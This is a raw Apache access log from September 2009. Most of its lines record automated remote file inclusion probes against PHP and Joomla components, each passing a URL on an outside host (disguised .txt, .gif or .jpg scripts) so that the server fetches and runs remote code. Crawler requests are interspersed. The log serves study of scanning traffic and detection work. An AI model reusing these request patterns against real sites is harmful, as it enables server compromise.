74.50.85.104 - - [07/Sep/2009:08:13:52 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:08:13:52 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:08:13:52 -0500] "GET /logs/access_log.1240444800/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:08:13:53 -0500] "GET /logs/access_log.1238112000/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:08:13:55 -0500] "GET /logs/access_log.1238112000/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
204.15.230.189 - - [07/Sep/2009:08:13:56 -0500] "GET /logs/jcs.function.php?mosConfig_absolute_path=http://www.greensamsung.com//upload/mc.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
204.15.230.189 - - [07/Sep/2009:08:13:56 -0500] "GET /jcs.function.php?mosConfig_absolute_path=http://www.greensamsung.com//upload/mc.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
65.55.106.155 - - [07/Sep/2009:08:14:33 -0500] "GET /logs/access_log.1172707200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.68.48 - - [07/Sep/2009:08:15:16 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.48 - - [07/Sep/2009:08:15:17 -0500] "GET /logs/access_log.1247961600 HTTP/1.1" 200 713631 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.189.18.73 - - [07/Sep/2009:08:15:37 -0500] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
211.189.18.73 - - [07/Sep/2009:08:15:37 -0500] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
194.176.118.45 - - [07/Sep/2009:08:16:06 -0500] "GET /logs/access_log.1239667200//e404.php?INCLUDE_FOLDER=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
211.189.18.73 - - [07/Sep/2009:08:16:08 -0500] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
211.189.18.73 - - [07/Sep/2009:08:16:08 -0500] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
219.85.63.226 - - [07/Sep/2009:08:21:55 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
94.136.37.141 - - [07/Sep/2009:08:21:56 -0500] "GET //?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
94.136.37.141 - - [07/Sep/2009:08:21:59 -0500] "GET /logs//?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 200 204075 "-""libwww-perl/5.803"
219.85.63.226 - - [07/Sep/2009:08:22:17 -0500] "GET /logs/access_log.1244764800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:08:22:17 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:08:22:17 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.130.29.11 - - [07/Sep/2009:08:23:26 -0500] "GET /logs//skin/jiyoo_skyblue/setup.php?dir=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
121.130.29.11 - - [07/Sep/2009:08:23:26 -0500] "GET //skin/jiyoo_skyblue/setup.php?dir=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
121.130.29.11 - - [07/Sep/2009:08:23:26 -0500] "GET /logs/access_log.1234224000//skin/jiyoo_skyblue/setup.php?dir=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
59.150.247.202 - - [07/Sep/2009:08:24:39 -0500] "GET /logs//skin/jiyoo_skyblue/setup.php?dir=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
59.150.247.202 - - [07/Sep/2009:08:24:39 -0500] "GET /logs/access_log.1234224000//skin/jiyoo_skyblue/setup.php?dir=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
59.150.247.202 - - [07/Sep/2009:08:24:39 -0500] "GET //skin/jiyoo_skyblue/setup.php?dir=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.239.157.203 - - [07/Sep/2009:08:24:56 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mabuhayradio.com/components/com_agora/img/members/0/1.jpg? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.239.157.203 - - [07/Sep/2009:08:24:56 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mabuhayradio.com/components/com_agora/img/members/0/1.jpg? HTTP/1.1" 404 342 "-""Mozilla/5.0"
211.239.157.203 - - [07/Sep/2009:08:24:57 -0500] "GET /logs/access_log.1240012800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mabuhayradio.com/components/com_agora/img/members/0/1.jpg? HTTP/1.1" 404 369 "-""Mozilla/5.0"
66.40.25.236 - - [07/Sep/2009:08:25:54 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://golden-j.com/icon1.gif??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
66.40.25.236 - - [07/Sep/2009:08:25:54 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://golden-j.com/icon1.gif??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
66.40.25.236 - - [07/Sep/2009:08:25:54 -0500] "GET /logs/access_log.1243468800//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://golden-j.com/icon1.gif??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.239.157.203 - - [07/Sep/2009:08:26:11 -0500] "GET /logs/access_log.1241654400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mabuhayradio.com/components/com_agora/img/members/0/1.jpg? HTTP/1.1" 404 369 "-""Mozilla/5.0"
204.15.230.189 - - [07/Sep/2009:08:26:58 -0500] "GET /logs//common/db.php?commonpath=http://www.hotlinkfiles.com/files/2792220_datae/fx29id2.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
204.15.230.189 - - [07/Sep/2009:08:26:58 -0500] "GET //common/db.php?commonpath=http://www.hotlinkfiles.com/files/2792220_datae/fx29id2.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
204.15.230.189 - - [07/Sep/2009:08:26:58 -0500] "GET /logs/access_log.1246924800//common/db.php?commonpath=http://www.hotlinkfiles.com/files/2792220_datae/fx29id2.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
211.40.68.132 - - [07/Sep/2009:08:27:00 -0500] "GET /logs/access_log.1232755200//admin/index.php?o=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
211.40.68.132 - - [07/Sep/2009:08:27:00 -0500] "GET //admin/index.php?o=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
211.40.68.132 - - [07/Sep/2009:08:27:01 -0500] "GET /logs//admin/index.php?o=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
66.40.25.236 - - [07/Sep/2009:08:27:24 -0500] "GET /logs/access_log.1242086400//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://golden-j.com/icon1.gif??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.106.137 - - [07/Sep/2009:08:27:32 -0500] "GET /logs/access_log.1149379200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.136.37.141 - - [07/Sep/2009:08:27:38 -0500] "GET //?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
94.136.37.141 - - [07/Sep/2009:08:27:38 -0500] "GET /logs/access_log.1236211200//?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
94.136.37.141 - - [07/Sep/2009:08:27:41 -0500] "GET /logs//?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 200 204075 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
61.100.186.87 - - [07/Sep/2009:08:28:16 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://golden-j.com/icon1.gif??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
61.100.186.87 - - [07/Sep/2009:08:28:16 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://golden-j.com/icon1.gif??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
61.100.186.87 - - [07/Sep/2009:08:28:16 -0500] "GET /logs/access_log.1243468800//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://golden-j.com/icon1.gif??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.100.186.87 - - [07/Sep/2009:08:28:16 -0500] "GET /logs/access_log.1242086400//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://golden-j.com/icon1.gif??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
204.15.230.189 - - [07/Sep/2009:08:28:32 -0500] "GET //common/db.php?commonpath=http://www.hotlinkfiles.com/files/2792220_datae/fx29id2.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
204.15.230.189 - - [07/Sep/2009:08:28:32 -0500] "GET /logs//common/db.php?commonpath=http://www.hotlinkfiles.com/files/2792220_datae/fx29id2.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
204.15.230.189 - - [07/Sep/2009:08:28:32 -0500] "GET /logs/access_log.1246924800//common/db.php?commonpath=http://www.hotlinkfiles.com/files/2792220_datae/fx29id2.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
114.4.8.14 - - [07/Sep/2009:08:28:48 -0500] "GET /logs/access_log.1239667200/?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
114.4.8.14 - - [07/Sep/2009:08:28:48 -0500] "GET /?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
114.4.8.14 - - [07/Sep/2009:08:28:54 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
94.136.37.141 - - [07/Sep/2009:08:29:00 -0500] "GET //?_zb_path=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
94.136.37.141 - - [07/Sep/2009:08:29:01 -0500] "GET /logs//?_zb_path=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 200 204075 "-""libwww-perl/5.803"
114.4.8.14 - - [07/Sep/2009:08:29:03 -0500] "GET /?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
114.4.8.14 - - [07/Sep/2009:08:29:03 -0500] "GET /logs/access_log.1239667200/?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
114.4.8.14 - - [07/Sep/2009:08:29:07 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
94.136.37.141 - - [07/Sep/2009:08:29:08 -0500] "GET //?_zb_path=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
94.136.37.141 - - [07/Sep/2009:08:29:11 -0500] "GET /logs//?_zb_path=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 200 204075 "-""libwww-perl/5.803"
114.4.8.14 - - [07/Sep/2009:08:29:41 -0500] "GET /logs/access_log.1248134400/?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
114.4.8.14 - - [07/Sep/2009:08:29:49 -0500] "GET /logs/access_log.1248134400/?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.122.72.216 - - [07/Sep/2009:08:30:40 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
222.122.72.216 - - [07/Sep/2009:08:30:40 -0500] "GET //include/lib.inc.php?site_path=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
222.122.72.216 - - [07/Sep/2009:08:30:40 -0500] "GET /logs/access_log.1236211200//include/lib.inc.php?site_path=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
94.136.37.141 - - [07/Sep/2009:08:30:51 -0500] "GET //?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
94.136.37.141 - - [07/Sep/2009:08:30:51 -0500] "GET /logs/access_log.1236211200//?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
94.136.37.141 - - [07/Sep/2009:08:30:56 -0500] "GET /logs//?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 200 204075 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
222.122.72.216 - - [07/Sep/2009:08:31:09 -0500] "GET /logs/access_log.1236038400//include/lib.inc.php?site_path=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
65.38.188.164 - - [07/Sep/2009:08:31:54 -0500] "GET ////modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
65.38.188.164 - - [07/Sep/2009:08:31:54 -0500] "GET /logs/access_log.1244764800////modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
65.38.188.164 - - [07/Sep/2009:08:31:54 -0500] "GET /logs////modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
65.38.188.164 - - [07/Sep/2009:08:32:07 -0500] "GET ////modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
65.38.188.164 - - [07/Sep/2009:08:32:07 -0500] "GET /logs////modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
65.38.188.164 - - [07/Sep/2009:08:32:07 -0500] "GET /logs/access_log.1244764800////modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
94.136.37.141 - - [07/Sep/2009:08:32:13 -0500] "GET /logs/access_log.1237075200//?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
93.99.254.254 - - [07/Sep/2009:08:33:06 -0500] "GET /logs/access_log.1246924800//common/db.php?commonpath=http://www.hotlinkfiles.com/files/2792220_datae/fx29id2.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
93.99.254.254 - - [07/Sep/2009:08:33:06 -0500] "GET /logs//common/db.php?commonpath=http://www.hotlinkfiles.com/files/2792220_datae/fx29id2.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
93.99.254.254 - - [07/Sep/2009:08:33:06 -0500] "GET //common/db.php?commonpath=http://www.hotlinkfiles.com/files/2792220_datae/fx29id2.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:08:37:44 -0500] "GET /logs/access_log.1239408000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:08:37:44 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:08:37:45 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:08:37:52 -0500] "GET /logs/access_log.1240444800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
65.55.106.231 - - [07/Sep/2009:08:39:03 -0500] "GET /logs/access_log.1247702400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.38.136.251 - - [07/Sep/2009:08:39:49 -0500] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:08:39:49 -0500] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:08:39:54 -0500] "GET /logs/access_log.1247702400/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 369 "-""Mozilla/5.0"
203.185.129.45 - - [07/Sep/2009:08:40:14 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
203.185.129.45 - - [07/Sep/2009:08:40:14 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
203.185.129.45 - - [07/Sep/2009:08:40:14 -0500] "GET /logs/access_log.1229299200//tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
114.4.8.14 - - [07/Sep/2009:08:40:56 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
114.4.8.14 - - [07/Sep/2009:08:40:56 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
114.4.8.14 - - [07/Sep/2009:08:40:56 -0500] "GET /logs/access_log.1243641600//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
114.4.8.14 - - [07/Sep/2009:08:41:23 -0500] "GET /logs/access_log.1247356800//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
114.4.8.14 - - [07/Sep/2009:08:41:27 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
114.4.8.14 - - [07/Sep/2009:08:41:27 -0500] "GET /logs/access_log.1243641600//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
114.4.8.14 - - [07/Sep/2009:08:41:27 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
65.55.106.233 - - [07/Sep/2009:08:41:32 -0500] "GET /logs/access_log.1169510400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
114.4.8.14 - - [07/Sep/2009:08:41:54 -0500] "GET /logs/access_log.1247356800//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
174.37.136.126 - - [07/Sep/2009:08:42:19 -0500] "GET /logs/access_log.1247875200//galeria.php?start=0&kategoria=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
174.37.136.126 - - [07/Sep/2009:08:42:19 -0500] "GET /logs//galeria.php?start=0&kategoria=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
174.37.136.126 - - [07/Sep/2009:08:42:19 -0500] "GET /logs/access_log.1246924800//galeria.php?start=0&kategoria=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
174.37.136.126 - - [07/Sep/2009:08:42:19 -0500] "GET //galeria.php?start=0&kategoria=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 295 "-""Mozilla/5.0"
195.190.166.35 - - [07/Sep/2009:08:42:28 -0500] "GET /logs/errors.php?error=http://tvse.nl/images/id.txt?%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
195.190.166.35 - - [07/Sep/2009:08:42:28 -0500] "GET /errors.php?error=http://tvse.nl/images/id.txt?%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
174.37.136.126 - - [07/Sep/2009:08:43:18 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
174.37.136.126 - - [07/Sep/2009:08:43:18 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
174.37.136.126 - - [07/Sep/2009:08:43:18 -0500] "GET /logs/access_log.1242691200//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 357 "-""Mozilla/5.0"
174.37.136.126 - - [07/Sep/2009:08:43:28 -0500] "GET /logs/access_log.1245801600//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 357 "-""Mozilla/5.0"
65.55.207.22 - - [07/Sep/2009:08:44:02 -0500] "GET /logs/access_log.1179792000 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
63.249.159.4 - - [07/Sep/2009:08:44:06 -0500] "GET /logs/index2.php?x=http://sqlz.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 298 "-""-"
63.249.159.4 - - [07/Sep/2009:08:44:08 -0500] "GET /index2.php?x=http://sqlz.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 293 "-""-"
69.64.84.44 - - [07/Sep/2009:08:44:17 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
69.64.84.44 - - [07/Sep/2009:08:44:17 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
69.64.84.44 - - [07/Sep/2009:08:44:17 -0500] "GET /logs/access_log.1243641600//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
69.64.84.44 - - [07/Sep/2009:08:45:08 -0500] "GET /logs/access_log.1247356800//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
58.184.252.3 - - [07/Sep/2009:08:46:16 -0500] "GET /cgi-bin//gadgets/Blog/BlogModel.php?path=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
58.184.252.3 - - [07/Sep/2009:08:46:16 -0500] "GET /logs/access_log.1245369600/cgi-bin//gadgets/Blog/BlogModel.php?path=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
58.184.252.3 - - [07/Sep/2009:08:46:16 -0500] "GET /logs/cgi-bin//gadgets/Blog/BlogModel.php?path=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
210.221.154.117 - - [07/Sep/2009:08:46:30 -0500] "GET /errors.php?error=http://www.ybcyyy.com/data/zkjs/fx29id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
210.221.154.117 - - [07/Sep/2009:08:46:30 -0500] "GET /logs/errors.php?error=http://www.ybcyyy.com/data/zkjs/fx29id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
210.221.154.117 - - [07/Sep/2009:08:46:30 -0500] "GET /logs/access_log.1236902400/errors.php?error=http://www.ybcyyy.com/data/zkjs/fx29id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
210.221.154.117 - - [07/Sep/2009:08:46:30 -0500] "GET /logs/access_log.1240099200/errors.php?error=http://www.ybcyyy.com/data/zkjs/fx29id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
210.221.154.117 - - [07/Sep/2009:08:47:10 -0500] "GET /errors.php?error=http://www.ybcyyy.com/data/zkjs/fx29id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
